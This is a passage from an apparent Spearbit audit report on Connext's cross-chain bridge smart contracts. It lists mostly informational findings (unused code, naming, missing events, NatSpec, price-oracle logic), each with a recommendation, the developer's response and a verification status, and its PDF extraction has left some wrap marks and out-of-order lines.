allowed in the StableSwap. If so, the owners of the worthless tokens could quickly swap them for real tokens. The canonical tokens will also be locked. function _removeAssetId(...) ... { ... } Recommendation: Check if representation tokens are still present/allowed in the StableSwap. Also consider checking how many of the tokens are in circulation. Connext: Solved in PR 2483. Spearbit: Verified. +5.5.30 Unused import IAavePool in InboxFacet Severity: Informational Context: InboxFacet.sol#L13 Description: Contract InboxFacet imports IAavePool, however it doesn't use it. import {IAavePool} from "../interfaces/IAavePool.sol"; Recommendation: Remove the import -import {IAavePool} from "../interfaces/IAavePool.sol"; Connext: Solved in PR 2491. Spearbit: Verified. 121 +5.5.31 Use IERC20Metadata Severity: Informational Context: BridgeFacet.sol#L6, BridgeFacet.sol#L514-L516, AssetLogic.sol#L5 The contract ERC20 is imported a few times, This to be able to access the decimals() interface can also be retrieved from the OpenZeppelin interface @openzep- Description: interface. pelin/contracts/token/ERC20/extensions/IERC20Metadata.sol, which seems more logical. BridgeFacet.sol import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol"; ... function _xcall(...) ... { ... ... AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); ... } AssetLogic.sol import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol"; ... function swapToLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(ERC20(_asset).decimals(), ERC20(_local).decimals(), _amount, _slippage) ... ... ,! } function swapFromLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(uint8(18), ERC20(adopted).decimals(), _normalizedIn, _slippage) ... ... } Recommendation: Consider using @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol instead of ERC20.sol. Connext: Solved in PR 2491. Spearbit: Verified. +5.5.32 Generic name of proposedTimestamp() Severity: Informational Context: ProposedOwnableFacet.sol#L106-L122 Description: The function proposedTimestamp() has a very generic name. As there are other Timestamp func- tions this might be confusing. function proposedTimestamp() public view returns (uint256) { return s._proposedOwnershipTimestamp; } function routerWhitelistTimestamp() public view returns (uint256) { return s._routerWhitelistTimestamp; } function assetWhitelistTimestamp() public view returns (uint256) { return s._assetWhitelistTimestamp; } Recommendation: Consider renaming proposedTimestamp() to proposedOwnershipTimestamp(). 122 Connext: It is not quite as specific as it could be, but changing the name would create an annoying interface difference with ProposedOwnable. Spearbit: Acknowledged. +5.5.33 Two different nonces Severity: Informational Context: LibConnextStorage.sol#L139, SpokeConnector.sol#L131-L133 Description: Both LibConnextStorage and SpokeConnector define a nonce. As the names are very similar this could be confusing. LibConnextStorage.sol struct AppStorage { ... * @notice Nonce for the contract, used to keep unique transfer ids. * @dev Assigned at first interaction (xcall on origin domain). uint256 nonce; ... } SpokeConnector.sol * @notice domain => next available nonce for the domain. mapping(uint32 => uint32) public nonces; Recommendation: Conder renaming one of the nonces. Connext: Acknowledged. Spearbit: Acknowledged. +5.5.34 Tips to optimize rootWithCtx Severity: Informational Context: Merkle.sol#L122-L126 Description: To help with the optimization mentioned in the comment of rootWithCtx(), here is a way to count the trailing 0s: graphics.stanford.edu/~seander/bithacks.html#ZerosOnRightModLookup. function rootWithCtx(Tree storage tree, bytes32[TREE_DEPTH] memory _zeroes) internal view returns (bytes32 _current) { ... // TODO: Optimization: skip the first N loops where the ith bits are all 0 - start at that // depth with zero hashes. ... ,! } Recommendation: If you do want to optimize, the link above can be used. However it is unlikely it will be a large saving. Connext: Acknowledged. Spearbit: Acknowledged. 123 +5.5.35 Use delete Severity: Informational Context: ProposedOwnable.sol#L161-L167, RoutersFacet.sol#L315 Description: The functions _setOwner() and removeRouter() clear values by setting them to 0. Other parts of the code use delete. So using delete here too would be more consistent. ProposedOwnable.sol function _setOwner(address newOwner) internal { ... _proposedOwnershipTimestamp = 0; _proposed = address(0); ... } RoutersFacet.sol function removeRouter(address router) external onlyOwnerOrRouter { ... s.routerPermissionInfo.routerOwners[router] = address(0); ... s.routerPermissionInfo.routerRecipients[router] = address(0); ... } Recommendation: Consider changing the code to: function _setOwner(address newOwner) internal { ... _proposedOwnershipTimestamp = 0; delete _proposedOwnershipTimestamp; _proposed = address(0); delete _proposed; ... - + - + } function removeRouter(address router) external onlyOwnerOrRouter { ... s.routerPermissionInfo.routerOwners[router] = address(0); delete s.routerPermissionInfo.routerOwners[router]; ... s.routerPermissionInfo.routerRecipients[router] = address(0); delete s.routerPermissionInfo.routerRecipients[router]; ... - + - + } Connext: Solved in PR 2492. Spearbit: Verified. 124 +5.5.36 replace usages of abi.encodeWithSignature and abi.encodeWithSelector with abi.encodeCall to ensure typo and type safety Severity: Informational Context: • SpokeConnector.sol#L520-L526 Description: • When abi.encodeWithSignature is used the compiler does not check for mistakes in the signature or the types provided. • When abi.encodeWithSelector is used the compiler does not check for parameter type inconsistencies. Recommendation: Create an interface for contracts that implement handle(uint32,uint32,bytes32,bytes), for example IHandle and instead here use the following to be typo and type safe: bytes memory _calldata = abi.encodeCall( IHandle.handle, ( _m.origin(), _m.nonce(), _m.sender(), _m.body().clone() ) ); This suggestion also applies to other locations where abi.encodeWithSignature or abi.encodeWithSelector have been used. Connext: Acknowledged. Spearbit: Acknowledged. +5.5.37 setAggregators is missing checks against address(0) Severity: Informational Context: ConnextPriceOracle.sol#L178 Description: setAggregators does not check if tokenAddresses[i] or sources[i] is address(0). Recommendation: Add checks to avoid potential pitfalls. Connext: Solved in PR 2232. Spearbit: Verified. +5.5.38 setAggregators can be simplified Severity: Informational Context: ConnextPriceOracle.sol#L178 Description: setAggregators does not check if tokenAddresses length is equal to sources to revert early. Recommendation: Check if tokenAddresses length is equal to sources. As an alternative, we can also pass a struct like below to avoid needing to check the equality if the length of these 2 arrays. 125 struct AggregatorData { address token; address source; } ... function setAggregators(AggregatorData[] calldata _aggregatorData) external onlyOwner { A good side effect is that the encoded calldata for setAggregators would also be smaller. Connext: Solved in PR 2232. Spearbit: Verified. +5.5.39 Event is not emitted when an important action happens on-chain Severity: Informational Context: • PortalFacet.sol#L57 • PortalFacet.sol#L64 • SpokeConnector.sol#L220 • SpokeConnector.sol#L418 • SpokeConnector.sol#L480 • ZkSyncHubConnector.sol#L124 Description: No event is emitted when an important action happens on-chain. Recommendation: We event for the context mentioned in this issue. • PortalFacet.sol#L57 : No event is emitted when the aavePool is changed: event AavePoolChanged(address oldAavePool, address newAavePool, address caller); • PortalFacet.sol#L64 : No event is emitted when aavePortalFeeNumerator is updated. • SpokeConnector.sol#L220 : No event is emitted when setDelayBlocks is called. • SpokeConnector.sol#L418 : No event is emitted when provenAggregateRoots[_aggregateRoot] is set. • SpokeConnector.sol#L480 : No event is emitted when provenMessageRoots[_messageRoot] is set. • ZkSyncHubConnector.sol#L124 : No event is emitted when a new root has been processed. Connext: Solved in PR 2493. Spearbit: Verified. 126 +5.5.40 Add unit/fuzz tests to make sure edge cases would not cause an issue in Queue._length Severity: Informational Context: Queue.sol#L130 Description: It is always assumed last + 1 >= first. It would be great to add unit/fuzz tests to check for this invariant. Adding these tests Recommendation: should/would ensure potential future mistakes. Connext: Yes, if first > last, it should only ever be by 1 (and indicates that the queue is full). We should fuzz to check whether any invariant states are attainable. We could add a require (or custom error) case here where we check this assumption, but I think it's a waste of gas if it's provably unattainable state ('provable' via testing). Spearbit: Acknowledged. +5.5.41 Consider using prefix(...) instead of slice(0,...) Severity: Informational Context: • BridgeMessage.sol#L232 • TypedMemView.sol#L493 Description: tokenId() calls TypedMemView.slice() function to slice the first few bytes from _message: return _message.slice(0, TOKEN_ID_LEN, uint40(Types.TokenId)); TypedMemView.prefix() can also be used here since it achieves the same goal. Recommendation: Consider using TypedMemView.prefix() instead of slice(). Connext: We think slice is slightly more readable, and consistent with other BridgeMessage implementations. Spearbit: Acknowledged. +5.5.42 Elaborate TypedMemView encoding in comments Severity: Informational Context: TypedMemView.sol#L33-L35 Description: TypedMemView describes its encoding in comments as: // next 12 are memory address // next 12 are len // bottom 3 bytes are empty The comments can be elaborated to make them less ambiguous. Recommendation: // next 12 bytes are memory address from where the memory view starts // next 12 bytes are length (in bytes) of the memory view // bottom 3 bytes are empty Connext: Acknowledged. Spearbit: Acknowledged. 127 +5.5.43 Remove Curve StableSwap paper URL Severity: Informational Context: SwapUtils.sol#L63, SwapUtilsExternal.sol#L55 Description: www.curve.fi/stableswap-paper.pdf The current working URL is curve.fi/files/stableswap-paper.pdf. to Curve StableSwap paper referenced in comments Link is no longer active: Recommendation: Consider removing the URL from comments and just refer to "Curve stableswap paper". Connext: Fixed in PR 2215. Spearbit: Verified. +5.5.44 Missing Validations in AmplificationUtils.sol Severity: Informational Context: AmplificationUtils.sol#L85-L86 Description: 1. If initialAPrecise=futureAPrecise then there will not be any ramping. 2. In stopRampA function, self.futureATime > block.timestamp can be revised to self.futureATime >= block.timestamp since once current timestamp has reached futureATime, futureAprice will be returned al- ways. Recommendation: Add a check to ensure initialAPrecise!=futureAPrecise. Connext: Issue number 1 is fixed by PR 2220. Issue number 2 was identified as false positive as mentioned in SpearBit section, Kindly reject the resolution pull PR 2219. Spearbit: The current check in the audit repo is better since, when self.futureATime == block.timestamp calling or not calling stopRampA will not make any difference. Stopping the ramp is only effective just before we reach self.futureATime and a1 6= a0. Also self.futureATime >= block.timestamp check would incur more gas usage. +5.5.45 Incorrect PriceSource is returned Severity: Informational Context: ConnextPriceOracle.sol#L97-L106 Description: Price Source is returned incorrectly in case of stale prices as shown below 1. getTokenPrice function is called with _tokenAddress T1. 2. Assume the direct price is stale, so tokenPrice is set to 0. uint256 tokenPrice = assetPrices[tokenAddress].price; if (tokenPrice != 0 && ((block.timestamp - assetPrices[tokenAddress].updatedAt) <= VALID_PERIOD)) { return (tokenPrice, uint256(PriceSource.DIRECT)); } else { tokenPrice = 0; } 3. Now contract tries to retrieve price from oracle. In case the price is outdated, the returned price will again be 0 and source would be set to PriceSource.CHAINLINK. if (tokenPrice == 0) { tokenPrice = getPriceFromOracle(tokenAddress); source = PriceSource.CHAINLINK; } 128 4. Assuming v1PriceOracle is not yet set, contract will simply return the price and source which in this case is 0, PriceSource.CHAINLINK. In this case amount is correct but source is not correct. return (tokenPrice, uint256(source)); Recommendation: If the price remains 0 then source returned should be PriceSource.NA Connext: Solved in PR 2232. Spearbit: Verified. +5.5.46 PriceSource.DEX is never used Severity: Informational Context: ConnextPriceOracle.sol#L58 Description: The enum value DEX is never used in the contract and can be removed. Recommendation: Remove DEX from PriceSource enum enum PriceSource { NA, DIRECT, CHAINLINK, V1_ORACLE } Connext: Solved in PR 2375. Spearbit: Verified. +5.5.47 Incorrect comment about handleOutgoingAsset Severity: Informational Context: AssetLogic.sol#L61 Description: The comment is incorrect as this function does not transfer funds to msg.sender. /** * @notice Handles transferring funds from the Connext contract to msg.sender. * @param _asset - The address of the ERC20 token to transfer. * @param _to - The recipient address that will receive the funds. * @param _amount - The amount to withdraw from contract. */ function handleOutgoingAsset( address _asset, address _to, uint256 _amount ) internal { Recommendation: Update the comment accordingly. Connext: Solved in PR 2221. Spearbit: Verified. 129 +5.5.48 SafeMath is not required for Solidity 0.8.x Severity: Informational Context: OZERC20.sol Description: Solidity 0.8.x has a built-in mechanism for dealing with overflows and underflows, so there is no need to use the SafeMath library Recommendation: Consider removing SafeMath. Connext: Solved in PR 2350. Spearbit: Verified. +5.5.49 Use a deadline check modifier in ProposedOwnable Severity: Informational Context: • ProposedOwnable.sol#L127-L129 • ProposedOwnable.sol#L151-L153 Description: Any change in ownership through acceptProposedOwner() and renounceOwnership() has to go through a deadline check: // Ensure delay has elapsed if ((block.timestamp - _proposedOwnershipTimestamp) <= _delay) revert ProposedOwnable__acceptProposedOwner_delayNotElapsed(); This check can be extracted out in a modifier for readability. Recommendation: Replace the highlighted code with a modifier deadlineCheck: modifier deadlineCheck() { if ((block.timestamp - _proposedOwnershipTimestamp) <= _delay) revert ProposedOwnable__OwnershipChange_delayNotElapsed(); _; } Connext: Solved in PR 2494. Spearbit: Verified. +5.5.50 Use ExcessivelySafeCall in SpokeConnector Severity: Informational Context: SpokeConnector.sol#L527-L550 Description: The low-level call code highlighted code above looks to be copied from ExcessivelySafeCall.sol. replacing this low-level call with the function call ExcessivelySafe- Consider Recommendation: Call.excessivelySafeCall(). Connext: Solved in PR 2523. Spearbit: Verified. 130 +5.5.51 s.LIQUIDITY_FEE_NUMERATOR might change while a cross-chain transfer is in-flight Severity: Informational Context: RoutersFacet.sol#L352 Description: s.LIQUIDITY_FEE_NUMERATOR might change while a cross-chain transfer is in-flight. Recommendation: Leave a note/warning for users that when their cross-chain transfers are in-flight, the liquidity fee might change but it will always be less than or equal to 5%. Connext: Acknowledged. Spearbit: Acknowledged. +5.5.52 The constant expression for EMPTY_HASH can be simplified Severity: Informational Context: BaseConnextFacet.sol#L17 Description: EMPTY_HASH is a constant with a value equal to: hex"c5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470", which is the keccak256 of an empty bytes. We can replace this constant hex literal with a more readable alternative. Recommendation: Use the following constant expression which is more readable that will also be inlined by the compiler Connext: Solved in PR 2495. Spearbit: Verified. +5.5.53 Simplify and add more documentation for getTokenPrice Severity: Informational Context: ConnextPriceOracle.sol#L83 Description: getTokenPrice can be simplified and it can try to return early whenever possible. Recommendation: The following is a more simplified version of getTokenPrice 131 function getTokenPrice(address _tokenAddress) public view override returns (uint256, uint256) { address tokenAddress = _tokenAddress; if (_tokenAddress == address(0)) { tokenAddress = wrapped; } uint256 tokenPrice = assetPrices[tokenAddress].price; if (tokenPrice != 0 && ((block.timestamp - assetPrices[tokenAddress].updatedAt) <= VALID_PERIOD)) { return (tokenPrice, uint256(PriceSource.DIRECT)); } tokenPrice = getPriceFromOracle(tokenAddress); if(tokenPrice != 0) { return (tokenPrice, uint256(PriceSource.CHAINLINK)); } if (v1PriceOracle != address(0)) { tokenPrice = IPriceOracle(v1PriceOracle).getTokenPrice(tokenAddress); if(tokenPrice != 0) { return (tokenPrice, uint256(PriceSource.V1_ORACLE)); } } return (0, uint256(PriceSource.NA)); } It would be great to document/comment that this function tries to source the price from different sources according to the following order: 1. From the current contract storage / directly. Data set by the owner. 2. From a chainlink aggregator. 3. From the v1PriceOracle if set. Connext: Solved in PR 2344. Spearbit: Verified. +5.5.54 Remove unused code, files, interfaces, libraries, contracts, ... Severity: Informational Context: Mentioned in Recommendation Description: The codebase includes code, files, interfaces, libraries, and contracts that are no longer in use. Recommendation: It would be best to remove unused code to declutter the codebase. • IGasTokenOracle.sol#L4 : IGasTokenOracle is an unused interface. • ITokenExchange.sol#L9 : ITokenExchange is an unused interface. • ConnextPriceOracle.sol#L22 : getRoundData function is unused. copied from AggregatorV3Interface.sol @ chainlink : Also, AggregatorV3Interface to the interfaces folder and create a file for it. Looks like this interface has been to move this interface it might be best • ConnextPriceOracle.sol#L72-L73 : Unsuded events NewAdmin and PriceRecordUpdated • Multicall.sol#L7 : Unsued contract Multicall • BridgeToken.sol#L7-L8 : Unused import of BridgeMessage • BaseConnextFacet.sol#L21 : Unused error BaseConnextFacet__onlyBridgeRouter_notBridgeRouter 132 • BridgeFacet.sol#L43 : Unused error BridgeFacet__xcall_notSupportedAsset • BridgeFacet.sol#L45 : Unused error BridgeFacet__xcall_canonicalAssetNotReceived • InboxFacet.sol#L38 : Unused error InboxFacet__reconcile_notConnext • TokenFacet.sol#L21 : Unused error TokenFacet__addAssetId_nativeAsset • RootManager.sol#L8 : Unsued import of Message • TypedMemView.sol#L401-L403 : Unused function sameType • TypeCasts.sol#L10 : Unused function coerceBytes32 • TypeCasts.sol#L15 : Unused function coerceString Connext: Solved in PR 2502. Spearbit: Verified. +5.5.55 _calculateSwapInv and _calculateSwap can mirror each other's calculations Severity: Informational Context: • SwapUtils.sol#L579-L580 • SwapUtils.sol#L543-L544 Description: _calculateSwapInv could have mirrored the implementation of _calculateSwap uint256 y = xp[tokenIndexTo] - (dy * multipliers[tokenIndexTo]); uint256 x = getY(_getAPrecise(self), tokenIndexTo, tokenIndexFrom, y, xp); Or the other way around _calculateSwap mirror _calculateSwapInv and pick whatever is cheaper. Recommendation: Consider simplifying the code by mirroring the implementation. Connext: Acknowledged. Spearbit: Acknowledged. +5.5.56 Document that the virtual price of a stable swap pool might not be constant Severity: Informational Context: SwapUtils.sol#L403 Description: The virtual price of the LP token is not constant when the amplification coefficient is ramping even when/if token balances stay the same. Recommendation: Document this issue for users and devs. Connext: Acknowledged. Spearbit: Acknowledged. 133 +5.5.57 Document the reason for picking d is the starting point for calculating getYD using the Newton's method. Severity: Informational Context: SwapUtils.sol#L285 Description: d the stable swap invariant passed to getYD as a parameter and it is used as the starting point of the Newton method to find a root. This root is the value/price for the tokenIndex token that would stabilize the pool so that it would statisfy the stable swap invariant equation. Recommendation: It would be great to leave comment and document the reasoning behind why d was selected as the starting point. Connext: Comment added in PR 2381. Spearbit: Verified. +5.5.58 Document the max allowed tokens in stable swap pools used Severity: Informational Context: StableSwapFacet.sol, SwapUtilsExternal.sol Description: Based on the uint8 type for the indexes of tokens in different stable swap pools, it is inferred that the max possible number of tokens that can exist in a pool is 256. There is the following check when initializing internal pools: if (_pooledTokens.length <= 1 || _pooledTokens.length > 32) revert SwapAdminFacet__initializeSwap_invalidPooledTokens(); This means the internal pools can only have number of pooled tokens in 2, (cid:1) (cid:1) (cid:1) , 32. Recommendation: It would be great if this maximum value was documented. Note: In Curve pool templates, the token indexes, and the number of tokens are of the type int128. Connext: Solved in PR 2360. Spearbit: Verified. +5.5.59 Rename adoptedToLocalPools to better indicate what it represents Severity: Informational Context: LibConnextStorage.sol#L152 Description: adoptedToLocalPools is used to keep track of external pools where one can swap between different variations of a token. But one might confuse this mapping as holding internal stable swap pools. Recommendation: To avoid confusion it would be best to rename this field to a name that better indicates what it represents (for example, externalPools or adoptedToLocalExternalPools). It is really important to mention that this is a mapping of external pools used by the protocol. Note, these external pools are only used when there are no internal pools for a token variation. Connext: Solved in PR 2358. Spearbit: Verified. 134 +5.5.60 Document the usage of commented mysterious numbers in AppStorage Severity: Informational Context: LibConnextStorage.sol#L120 Description: Before each struct AppStorage's field definition there is a line comment consisting of only digits // xx One would guess they might be relative slot indexes in the storage (relative to AppStorage's slot). But the numbers are not consistent. Recommendation: It would be best to add further comments as to what they mean. And if they do represent relative storage slots, some of those would need to be corrected. Connext: Acknowledged. Spearbit: Acknowledged. +5.5.61 RouterPermissionsManagerInfo can be packed differently for readability Severity: Informational Context: LibConnextStorage.sol#L111-L118 Description: RouterPermissionsManagerInfo has multiple fields that are each a mapping of address to a differ- ent value. The address here represents a liquidity router address. It would be more readable to pack these values such that only one mapping is used. This would also indicate how all these mapping have the same shared key which is the router. Recommendation: The RouterPermissionsManagerInfo can be changed into routerInfos // note this would pack tighter in storage struct RouterInfos { bool approved; bool approvedForPortals; address recipient; address owner; address proposedOwner; uint256 proposedTimestamp; } ... // field in AppStorage mapping(address => RouterInfo) routerInfos; Note: This suggestion only applies to new deployments and not to the case when upgrading the contract. Connext: This should be done in a separate PR, where we manage the configuration separately. See con- next/nxtp@6fdac03. Spearbit: Verified. 135 +5.5.62 Consolidate TokenId struct into a file that can be imported in relevant files Severity: Informational Context: • BridgeMessage.sol#L39-L42 • LibConnextStorage.sol#L38-L41 Description: TokenId struct is defined both in BridgeMessage and LibConnextStorage with the same struc- ture/fields. If in future, one would need to update one struct the other one should also be updated in parallel. Recommendation: To avoid syncing issues, it is recommended to either import TokenId from one of the files into the other or extract TokenId into a shared file that can be imported to both of the mentioned files. Connext: Solved in PR 2496. Spearbit: Verified. +5.5.63 Typos, grammatical and styling errors Severity: Informational Context: Mentioned in Recommendation Description: There are a few typos and grammatical mistakes that can be corrected in the codebase. Recommendation: • AssetLogic.sol#L527 : recieved should be received • LibConnextStorage.sol#L154 : missing the - * @notice Mapping of whitelisted assets on same domain as contract. + * @notice Mapping of whitelisted assets on the same domain as the contract. • LibDiamond.sol#L98 : typos, befor should be before and elpases should be elapses - // period or befor the delay elpases + // period or before the delay elapses • ConnextPriceOracle.sol#L126 : typo > should be < - // answeredInRound > roundId ===> ChainLink Error: Stale price + // answeredInRound < roundId ===> ChainLink Error: Stale price • TokenFacet.sol#L290 : Typo _adooted should be _adopted • ProposedOwnableFacet.sol#L160 : typo sounce should be source • ProposedOwnableFacet.sol#L273 : typo assingned should be assigned • RelayerFacet.sol#L71-L72 : typo router should be relayer fee vault - * @notice Updates the relayer fee router - * @param _relayerFeeVault The address of the new router + * @notice Updates the relayer fee vault + * @param _relayerFeeVault The address of the new relayer fee vault • IArbitrumInbox.sol#L5 : typo messagesto should be messages to • IArbitrumOutbox.sol#L5 : typo messagesto should be messages to • IArbitrumOutbox.sol#L32-L34 : usage of /// is not consistent with other comment blocks. • Connector.sol#L87 : Typo HubConnector should be Connector 136 • ArbitrumHubConnector.sol#L128 : Typo none should be node's • GnosisHubConnector.sol#L49 : Typo l1 should be l2 • RoutersFacet.sol#L194 : Confusing comment. - * @notice Returns the approved router for the given router address + * @notice Returns whether a given router address is approved or not • RoutersFacet.sol#L197 : getRouterApproval can be renamed to isApprovedRouter • RoutersFacet.sol#L251 : getRouterApprovalForPortal can be renamed to isRouterApprovedForAavePor- tal • PriceOracle.sol#L15 : add return named parameters for clarity and update the @return NatSpec accordingly: function getTokenPrice(address token) external view virtual returns (uint256 price, uint256 source); Connext: Partly solved in PR 2297. We’ll fix the rest later on. Spearbit: Acknowledged. +5.5.64 Keep consistent return parameters in calculateSwapToLocalAssetIfNeeded Severity: Informational Context: AssetLogic.sol#L392-L394 Description: All return paths in calculateSwapToLocalAssetIfNeeded except one return _local as the 2nd return parameter. It would be best for readability and consistency change the following code to follow the same pattern if (_asset == _local) { return (_amount, _asset); } Recommendation: Change the above few lines to if (_local == _asset) { return (_amount, _local); } Connext: Solved in PR 2357. Spearbit: Verified. +5.5.65 Fix/add or complete missing NatSpec comments. Severity: Informational Context: Mentioned in Recommendation Description: Some NatSpec comments are either missing or are incomplete. Recommendation: Add or complete missing NatSpec comments. • AssetLogic.sol#L184-L205, missing the @return NatSpec for the 1st return parameter of type bool. • LibConnextStorage.sol#L113 : Missing NatSpec comment for approvedForPortalRouters. Note this field is used to query for approved liquidity routers that can borrow from Aave Portal. • SwapUtils.sol#L137-L145 : It would be best to have the NatSpec @param comments in the same order as the supplied parameters to the function. • IXReceiver.sol#L5 : IXReceiver is missing a NatSpec and it is a crucial component of the protocol. The following should be specially documented: 137 – Having a way to recover the tokens send to the receiving contract, when the call to xReceive fails. – Being able to do an xcall to send back results. – Limits on the amount of gas that can be used. • IDiamondCut.sol#L51 : We are not proposing here. This is a @notice for rescindDiamondCut. • ProposedOwnableFacet.sol#L125-L127 : The delay() is also used for other proposals, not only changing the ownership (removing asset or router whitelists). • RelayerFacet.sol#L26-L27 : Make the comments more specific - * @notice Emitted when a relayer is added or removed from whitelists - * @param relayer - The relayer address to be added or removed + * @notice Emitted when a relayer is added to the whitelists + * @param relayer - The relayer address to be added • RelayerFacet.sol#L33-L34 : Make the comments more specific - * @notice Emitted when a relayer is added or removed from whitelists - * @param relayer - The relayer address to be added or removed + * @notice Emitted when a relayer is removed from the whitelists + * @param relayer - The relayer address to be removed • StableSwapFacet.sol#L242: Missing NatSpec comments for minAmountOut and deadline parameters. • StableSwapFacet.sol#L266: Missing NatSpec comments for maxAmountIn and deadline parameters. • StableSwap.sol#L347: Missing NatSpec comments for deadline parameter. • StableSwap.sol#L366: Missing NatSpec comments for deadline parameter. • IConnectorManager.sol#L18-L21 : home() returns an IOutbox interface, but in the NatSpec comments there is only a mention of local inbox contract. • BridgeFacet.sol#L147-L153 : Clarifiy that in the NatSpec, instance refers to a connext remote xApp router instance. And perhaps the event name RemoteAdded and its second input parameter's name address remote can be renamed accordingly. • BridgeMessage.sol#L178-L183 : Document whether evmId is being called by some off-chain agent. Other- wise this function has not being used in the codebase and can possibly be removed. Connext: Acknowledged. Spearbit: Acknowledged. +5.5.66 Define and use constants for different literals used in the codebase. Severity: Informational Context: • AssetLogic.sol#L180 • AssetLogic.sol#L260 • AssetLogic.sol#L330 • AssetLogic.sol#L528 Description: Throughout the project, a few literals have been used. It would be best to define a named constant for those. That way it would be more clear the purpose of those values used and also the common literals can be consolidated into one place. Recommendation: • AssetLogic.sol#L180 : Define a named constant for uint8(18). 138 • AssetLogic.sol#L260, AssetLogic.sol#L330 : 3600 could be a constant ONE_HOUR. • AssetLogic.sol#L528 : define a named constant for 10_000. Connext: Solved in PR 2497. Spearbit: Verified. +5.5.67 Enforce using adopted for the returned parameter in swapFromLocalAssetIfNeeded... for consis- tency. Severity: Informational Context: • AssetLogic.sol#L162 • AssetLogic.sol#L212 • AssetLogic.sol#L355 Description: The other return paths in swapFromLocalAssetIfNeeded, swapFromLocalAssetIfNeededForEx- actOut and calculateSwapFromLocalAssetIfNeeded use the adopted parameter as one of the return value com- ponents. It would be best to have all the return paths do the same thing. Note swapFromLocalAssetIfNeeded and calculateSwapFromLocalAssetIfNeeded should always return (_, adopted) and swapFromLocalAssetIfNeededForExactOut should always return (_, _, adopted). Recommendation: Change // swapFromLocalAssetIfNeeded address adopted = s.canonicalToAdopted[_key]; if (adopted == _asset) { return (_amount, _asset); } ... // swapFromLocalAssetIfNeededForExactOut address adopted = s.canonicalToAdopted[_key]; if (adopted == _asset) { return (true, _amount, _asset); } ... // calculateSwapFromLocalAssetIfNeeded // If the adopted asset is the local asset, no need to swap. address adopted = s.canonicalToAdopted[_key]; if (adopted == _asset) { return (_amount, _asset); } To 139 // swapFromLocalAssetIfNeeded address adopted = s.canonicalToAdopted[_key]; if (adopted == _asset) { return (_amount, adopted); // <--- changed line } ... // swapFromLocalAssetIfNeededForExactOut address adopted = s.canonicalToAdopted[_key]; if (adopted == _asset) { return (true, _amount, adopted); // <--- changed line } ... // calculateSwapFromLocalAssetIfNeeded // If the adopted asset is the local asset, no need to swap. address adopted = s.canonicalToAdopted[_key]; if (adopted == _asset) { return (_amount, adopted); // <--- changed line } Connext: Solved in PR 2356. Spearbit: Verified. +5.5.68 Use interface types for parameters instead of casting to the interface type multiple times Severity: Informational Context: • AssetLogic.sol#L38-L58 Description: Sometimes casting to the interface type has been performed multiple times. It will be cleaner if the parameter is defined as having that interface and avoid unnecessary casts. Recommendation: Change the input parameter type of _asset from address to IERC20 in handleIncomingAsset: 140 using SafeERC20 for IERC20; ... function handleIncomingAsset(IERC20 _asset, uint256 _amount) internal { // Sanity check: if amount is 0, do nothing. if (_amount == 0) { return; } // Sanity check: asset address is not zero. if (address(_asset) == address(0)) { revert AssetLogic__handleIncomingAsset_nativeAssetNotSupported(); } // Record starting amount to validate correct amount is transferred. uint256 starting = _asset.balanceOf(address(this)); // Transfer asset to contract. _asset.safeTransferFrom(msg.sender, address(this), _amount); // Ensure correct amount was transferred (i.e. this was not a fee-on-transfer token). if (_asset.balanceOf(address(this)) - starting != _amount) { revert AssetLogic__handleIncomingAsset_feeOnTransferNotSupported(); } } Also, note that we added using SafeERC20 for IERC20; which can be used for all other transfer functions IERC20 types in this library. Connext: Solved in PR 2498. Spearbit: Verified. +5.5.69 Be aware of tokens with multiple addresses Severity: Informational Context: RoutersFacet.sol#L536-L571 Description: If a token has multiple addresses (see weird erc20) then the token cap might have an unexpected effect, especially if the two addresses have a different cap. function _addLiquidityForRouter(...) ... { ... if (s.domain == canonical.domain) { // Sanity check: caps not reached uint256 custodied = IERC20(_local).balanceOf(address(this)) + _amount; uint256 cap = s.caps[key]; if (cap > 0 && custodied > cap) { revert RoutersFacet__addLiquidityForRouter_capReached(); } } ... } Recommendation: For tokens with multiple addresses: whitelist only one address or have the same caps is multiple addresses are whitelistes. Connext: Acknowledged. Spearbit: Acknowledged. 141 +5.5.70 Remove old references to claims Severity: Informational Context: RelayerFacet.sol#L13-L14, RelayerFacet.sol#L46-L54 Description: The contract RelayerFacet still has some references to claims. These are a residue from a previous version and are not used currently. error RelayerFacet__initiateClaim_emptyClaim(); error RelayerFacet__initiateClaim_notRelayer(bytes32 transferId); event InitiatedClaim(uint32 indexed domain, address indexed recipient, address caller, bytes32[] transferIds); ,! event Claimed(address indexed recipient, uint256 total, bytes32[] transferIds); Recommendation: Remove the following: -error RelayerFacet__initiateClaim_emptyClaim(); -error RelayerFacet__initiateClaim_notRelayer(bytes32 transferId); -event InitiatedClaim(uint32 indexed domain, address indexed recipient, address caller, bytes32[] transferIds); ,! -event Claimed(address indexed recipient, uint256 total, bytes32[] transferIds); Connext: Removed. Spearbit: Verified. +5.5.71 Doublecheck references to Nomad Severity: Informational Context: Connext contracts Description: The code refers to nomad several times in a way that is currently not accurate. This could be confusing to the maintainers and readers of the code. This includes the following examples: BridgeFacet.sol:419: * @notice Initiates a cross-chain transfer of funds, calldata, and/or various named properties using the nomad ,! BridgeFacet.sol:423: * assets will be swapped for their local nomad asset counterparts (i.e. bridgeable tokens) via the configured AMM if swap is needed. The local tokens will * necessary. In the event that the adopted assets *are* local nomad assets, no ,! BridgeFacet.sol:424: ,! InboxFacet.sol:87: RoutersFacet.sol:533: AssetLogic.sol:102: asset. ,! AssetLogic.sol:139: swap ,! AssetLogic.sol:185: swap ,! AssetLogic.sol:336: adopted asset ,! AssetLogic.sol:375: * @notice Only accept messages from an Nomad Replica contract. * @param _local - The address of the nomad representation of the asset * @notice Swaps an adopted asset to the local (representation or canonical) nomad * @notice Swaps a local nomad asset for the adopted asset using the stored stable * @notice Swaps a local nomad asset for the adopted asset using the stored stable * @notice Calculate amount of tokens you receive on a local nomad asset for the * @notice Calculate amount of tokens you receive of a local nomad asset for the adopted asset ,! LibConnextStorage.sol:54: * @param receiveLocal - If true, will use the local nomad asset on the destination instead of adopted. ,! LibConnextStorage.sol:148: madUSDC on polygon). ,! LibConnextStorage.sol:204: LibConnextStorage.sol:268: madUSDC on polygon) * @dev Swaps for 